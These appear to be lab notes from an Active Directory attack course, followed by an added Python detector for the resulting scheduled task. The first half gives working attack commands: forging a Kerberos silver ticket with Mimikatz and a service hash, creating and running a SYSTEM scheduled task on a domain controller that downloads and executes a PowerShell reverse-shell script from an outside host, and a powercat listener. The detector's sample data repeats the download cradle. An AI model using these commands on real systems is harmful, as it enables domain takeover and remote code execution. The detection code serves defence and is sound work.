Create Silver Ticket

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'

Creating Task

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Student648" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcp.ps1''')'"

Running The Task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Student648"

Setting Up Listener

powercat -l -p 4444 -v -t 1024
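
Detecting The Task

The scheduled task from the steps above is logged on the target as Security event 4698 ("A scheduled task was created") when auditing of other object access events is enabled. The following is an added example, not part of the original notes: it flags 4698 records whose task action pairs a script host with a network fetch and runs as SYSTEM. The helper names and both sample events are constructed, and it assumes the events were already exported into dictionaries keyed by EventData field name.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
# A script host plus a network fetch in the action is the shape of a download cradle.
HOSTS = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)(\.exe)?\b", re.I)
FETCH = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|https?://", re.I)

def task_xml(user_id, command, arguments=""):
    """Build a minimal Task Scheduler XML document (constructed sample data)."""
    return (f'<Task xmlns="{NS["t"]}"><Principals><Principal id="Author">'
            f"<UserId>{user_id}</UserId></Principal></Principals><Actions>"
            f"<Exec><Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")

def suspicious_task(event):
    """Return the reasons a 4698 event looks suspicious (empty list = no finding)."""
    try:
        root = ET.fromstring(event["TaskContent"])
    except (ET.ParseError, KeyError):
        return ["unparseable TaskContent"]
    user = root.findtext("t:Principals/t:Principal/t:UserId", "", NS).strip().lower()
    reasons = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        line = f"{ex.findtext('t:Command', '', NS)} {ex.findtext('t:Arguments', '', NS)}".strip()
        if HOSTS.search(line) and FETCH.search(line):
            reasons.append("script host with network fetch: " + line)
    if reasons and user in SYSTEM_IDS:
        reasons.append("runs as SYSTEM")
    return reasons

# Constructed 4698 records: only the EventData fields this check reads.
EVENTS = [
    {"TaskName": "\\Student648", "SubjectUserName": "Administrator",
     "TaskContent": task_xml("S-1-5-18", "powershell.exe",
         "-c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcp.ps1''')'")},
    {"TaskName": "\\VendorUpdate", "SubjectUserName": "svc_patch",
     "TaskContent": task_xml("S-1-5-18", "C:\\Program Files\\Vendor\\updater.exe", "/silent")},
]

def findings(events):
    """Map task name -> reasons for every event that produced at least one reason."""
    return {e.get("TaskName", "?"): r for e in events if (r := suspicious_task(e))}

if __name__ == "__main__":
    for name, why in findings(EVENTS).items():
        print(name, "->", "; ".join(why))
```

The vendor updater task also runs as SYSTEM but is not flagged, because the SYSTEM principal alone is too common to alert on.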
